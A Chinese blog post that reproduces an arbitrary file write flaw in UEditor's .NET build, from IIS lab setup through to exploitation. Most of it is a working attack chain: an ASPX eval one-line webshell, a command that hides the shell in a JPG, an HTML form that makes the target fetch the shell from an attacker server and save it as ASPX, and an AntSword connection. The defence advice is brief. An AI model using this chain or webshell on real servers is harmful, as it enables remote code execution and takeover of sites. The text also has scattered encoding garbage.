一��、漏洞描述
UEditor是一款所見即所得的開源富文本編輯器,具有輕量、可定制��、用戶體驗優秀等特點�����,被廣大WEB應用程序所使用。本次爆出的高危漏洞屬于.NET版本����,其它的版本暫時不受影響���。漏洞成因是在抓取遠程數據源的時候未對文件后綴名做驗證導致任意文件寫入漏洞����,黑客利用此漏洞可以在服務器上執行任意指令���,綜合評級高危���。
二��、影響范圍
該漏洞影響UEditor的.Net版本��,其它語言版本暫時未受影響。
三���、漏洞原理
漏洞的成因是在獲取圖片資源時僅檢查了Content-Type����,導致可以繞過達到任意文件上傳����。具體的漏洞分析可參考:https://www.freebuf.com/vuls/181814.html
四、漏洞復現
1、環境部署
準備一臺Windows Server服務器���,我用的是Windows 2008 Server���。
沒有安裝.NET Framework 4.0的要先安裝:http://www.microsoft.com/zh-cn/download/details.aspx?id=17718
安裝完 .NET Framework 4.0 后���,還需要向 IIS 注冊應用程序池��,注冊的方法是�����,使用管理員權限打開命令提示符(CMD),輸入以下命令:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis -i
安裝完畢后,在 IIS 管理器刷新就能看到 4.0 的應用程序池。
https://github.com/fex-team/ueditor/releases/tag/v1.4.3.3 下載utf8的.net版本
右鍵 網站–添加網站,選擇下載的Ueditor目錄, 選擇版本為 4.0 的應用程序池��;點擊連接為��,設置特定用戶�����,該特定用戶為主機上存在的用戶例如administrator
此時訪問127.0.0.1:8080已經有Ueditor的界面了
代碼要求以應用程序的形式來運行(可以方便加入庫依賴和組織代碼)。所以需要把 net 目錄轉換為應用程序���;點擊連接為,設置特定用戶�,該特定用戶為主機上存在的用戶例如administrator
訪問net/controller.ashx 控制器文件���,出現以下界面說明編輯器應用程序運行成功���,且漏洞存在�,到此配置完畢����。
如果配置過程中訪問頁面顯示權限不夠的報錯,那么右鍵部署項目的文件夾��,選擇屬性�,選擇安全���,增加Everyone用戶�����,將該用戶的權限設置為完全控制�,點擊確定��,重新部署即可�����。
2、攻擊流程
訪問http://ip:port/net/controller.ashx 控制器文件�。當出現下圖的時候表示漏洞存在
準備一個aspx一句話木馬
<% @Page Language="Jscript"%><%eval(Request.Item["w01ke"],"unsafe");%>
制作圖片馬
copy w01ke.jpg /b + shell.aspx /a ueditor.jpg
準備一臺服務器存放圖片馬或者需要上傳的文件���,將做好的ueditor.jpg圖片馬上傳到我們的服務器�,并開啟下載服務(HTTP)
python -m SimpleHTTPServer 8080
制作一個HTML�����。因為不是上傳漏洞所以enctype 不需要指定為multipart/form-data����。
<form action="http://xxxxx/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr: <input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>
其中http://xx.com 為需要測試的網站地址���,action后填寫路徑為實際中遇到的路徑��,不要太死板�,如果太死板不按網站的實際路徑來就會出現路徑找不到的錯誤
打開我們做好的HTML,shell addr 處填寫服務器上圖片馬地址��,構造成以下格式�,繞過上傳使其解析為 aspx
http://xxxx/ueditor.jpg?.aspx
點擊submit�,直接顯示無效URL
經過排查,發現不能用Python開啟web的方式�,貌似只能用域名的形式(我不確定)��,我只好把我的圖片馬上傳至云服務器,然后修改訪問域名即可成功��,同時回顯了木馬路徑
使用蟻劍連接:
五����、防御措施
修改CrawlerHandler.cs 增加對文件擴展名的;
IPS等防御產品可以加入相應的特征
————————————————
版權聲明:本文為CSDN博主「w01ke」的原創文章����,遵循CC 4.0 BY-SA版權協議��,轉載請附上原文出處鏈接及本聲明。
原文鏈接:https://blog.csdn.net/m0_51468027/article/details/126077427
該文章在 2023/10/28 11:15:58 編輯過
400 186 1886
